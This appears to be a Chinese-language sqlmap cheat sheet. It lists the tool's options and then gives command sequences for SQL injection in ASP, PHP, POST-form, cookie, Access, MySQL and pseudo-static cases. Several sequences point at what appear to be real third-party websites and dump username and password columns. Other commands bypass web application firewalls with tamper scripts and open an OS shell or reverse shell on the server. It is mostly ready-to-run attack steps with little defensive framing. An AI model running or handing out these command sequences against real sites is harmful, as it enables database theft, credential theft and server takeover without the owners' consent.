-p            指定测试参数 -b            获取banner --dbs           列举数据库  --is-dba        是否是管理员权限 --current-db        当前数据库 --current-user        当前用户 --tables        列举数据库的表名 --count            检索所有条目数 --columns        获取表的列名 --dump             获取表中的数据，包含列  --dump-all        转存DBMS数据库所有表项目 --level            测试等级(1-5)，默认为1 -v               显示详细信息 --delay 1（1秒）表示延时1秒进行注入

读取数据库--->读取表---->读取表的字段---->获取内容

-D              指定数据库

-T            指定表

-C            指定字段

--dbms=mysql  oracle mssql         指定数据库 =======================================

参照官方文档：https://github.com/sqlmapproject/sqlmap/wiki/Usage。 --safe-url：提供一个安全不错误的连接，每隔一段时间都会去访问一下。 --safe-freq：提供一个安全不错误的连接，每次测试请求之后都会再访问一边安全连接。 -b    获取banner -p    指定测试参数 -g    从google中获取URL , -g "inurl:aspx?id=" --gpage=GOOGLEPAGE    指定Google页码 --union-check    是否支持union 注入 --union-cols     union 查询表记录 --union-test     union 语句测试 --union-use     采用union 注入 --proxy    代理注入 ---threads    采用多线程 --user-agent     自定义user-agent --referer=REFERER    HTTP referer头 --proxy=PROXY    使用代理 --string    指定关键词 --tor    创建tor的匿名网络 --predict-output    常见的查询输出预测 --keep-alive    使用持久HTTP（S）连接 --eval=EVALCODE    所使用HTTP参数污染 -a,-all    查询所有 --hostname    主机名 --is-dba    是否是管理员权限 --users    枚举所有用户 --passwords    枚举所有用户密码 --roles    枚举所有用户角色 --schema    枚举DBMS模式 --count    检索所有条目数 --dump    转存DBMS数据库表项目，需要制定字段名称(列名称) --dump-all    转存DBMS数据库所有表项目 --search    搜索列，表或数据库名称 --exclude-sysdbs    在枚举表时排除系统数据库 --sql-query=query    执行SQL语句 --file-read=RFILE    读取操作 --file-write=WFILE    写入操作 --file-dest=DFILE    绝对路径写入 --reg-read    阅读一个Windows注册表项值 --reg-add    增加一个Windows注册表项值数据 --reg-del    删除一个Windows注册表项值数据 --reg-key=REGKEY    Windows注册表键 --reg-value=REGVAL    Windows注册表键值 -- reg-data=REGDATA    Windows注册表的键值项数据 --reg-type=REGTYPE    Windows注册表键的值类型 --csv-del=CSVDEL    划定CSV输出中使用的字符 (default ",") --dump-format=DUMP    转存数据格式(CSV (default), HTML or SQLITE) --hex    使用十六进制数据检索功能 --output-dir=ODIR    自定义输出的目录路径 --update    更新SQLMap --purge-output    安全的删除所有内容输出目录 --check-waf    启发式检查WAF / IPS / IDS保护 --os-pwn    反弹shell --cookie=COOKIE    指定HTTP Cookie ，预登陆 --random-agent    使用随机选定的User-Agent头 --tamper=TAMPER    使用SQLMap插件 --level    测试等级(1-5)，默认为1 ==================================================== 加载tamper脚本过waf sqlmap.py -u http://127.0.0.1/test.php?id=1 –tamper “space2morehash.py”//脚本的名称 ==================================================== asp注入 sqlmap -u http://xaweichi.com/product_list.asp?id230 --tables //猜解表段  sqlmap -u http://xaweichi.com/product_list.asp?id230 --columns -T manage //猜解 字段  sqlmap -u http://xaweichi.com/product_list.asp?id230 --dump C "classid,id" -T manage //猜字段内容 ==================================================== php的注入  sqlmap -u http://www1.upweb.net/book/subject.php?id156 --dbs //猜解数据库  sqlmap -u http://www1.upweb.net/book/subject.php?id156 -D www1topxx数据库 --tables //猜解这个数据库的表 sqlmap -u http://www1.upweb.net/book/subject.php?id156 -D www1topxx -D www1topxx --columns -T user1表名 //猜解这个表里面的字段  sqlmap -u http://www1.upweb.net/book/subject.php?id156 -D www1topxx -D www1topxx --dump C "user_name,user_pass"//两个字段名称 --columns -T user1 //猜解这个字段的内容 ==================================================== post搜索框的注入  http://www.zjyingsong.com/product.asp post注入框的注入原理 大家可以自己百度一下哦！ 要进行post注入我们首先要抓包 。。 随便输入一个1字 burpsuite已经抓到包了 抓到的发包内容key1&x23&y4 sqlmap -u http://www.zjyingsong.com/product.asp --data "key1&x23&y4" --tables //猜解表段 sqlmap -u http://www.zjyingsong.com/product.asp --data "key1&x23&y4" --columns -T 表段 //猜解字段 sqlmap -u http://www.zjyingsong.com/product.asp --data "key1&x23&y4" --dump C "内容,内容," -T 刚才的表段 //猜解内容   ==================================================== cookies站点的注入  sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2 //判断

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2 //猜解表名

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --columns -T manage --level 2 //猜解字段

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --dump C "classid,id" -T manage --level 2  //猜解字段内容 ==================================================== sqlmap-Access数据库注入 sqlmap.py -u http://www.t00ts.net/test.asp?id=123 --tables //猜解表名 sqlmap.py -u http://www.t00ts.net/test.asp?id=123 -T "表名" --columns  //猜字段 sqlmap.py -u http://www.t00ts.net/test.asp?id=123 -T "表名" -C "字段名" --dump //猜字段内容 ==================================================== sqlmap-Mysql数据库注入 sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --current-user //* 注解：获取当前用户名称 sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --current-db //*当前数据库 sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --tables -D "数据库名" //*猜数据库表 sqlmap.py -u http://www.t00ts.net/test.php?id=123 --dbms "Mysql" --columns -T "表名" -D "数据库名" ==================================================== post注入 1.抓包注入 C:\sb.txt >>>>>>>>数据包的储存地址，//地址没有存储限制 sqlmap -r C:\sb.txt --dbs -v 2 //列数据库 sqlmap -r C:\sb.txt --tables -D "数据库名称" -v 2 //列出表名 sqlmap -r C:\sb.txt --columns -T "表名" -D "数据库名称" -v 2 //列出字段 sqlmap -r C:\sb.txt --dump -C "猜解的内容，猜解的内容" -T "表名" -D "数据库名称" -v 2//猜内容

sqlmap -r C:\sb.txt -P xxxx //-P指出特点参数

sqlmap.py -u http://127.0.0.1/login.asp --forms //自动寻找注入参数 sqlmap.py -u http://127.0.0.1/login.asp --data "xx=xx&xx=xx" //指定参数 ==================================================== 交互写shell及命令执行 sqlmap.py -u 127.0.0.1/asp.asp?id=1 --os-cmd=ipcomig //执行cmd命令ipcomig ps：会提示选择脚本，写出网站根目录。 sqlmap.py -u 127.0.0.1/asp.asp?id=1 --os-shell//也可以执行cmd命令，会在网站根目录生成两个为tmpbxbxz.php和tmpuoiuz.php,tmpbxbxz.php这个文件可以上传一些脚本。 ==================================================== 伪静态注入 sqlmao.py -u 127.0.0.1/100*.html //.html前面加*这么一个字符进行操作

==================================================== 请求延时注入 sqlmap.py --dbs -u 127.0.0.1/100*.html --delay 1 //延时一秒访问，进行采集数据库 sqlmap.py --dbs -u 127.0.0.1/100*.html --safe-freq //--safe-freq：提供一个安全不错误的连接，每次测试请求之后都会再访问一边安全连接。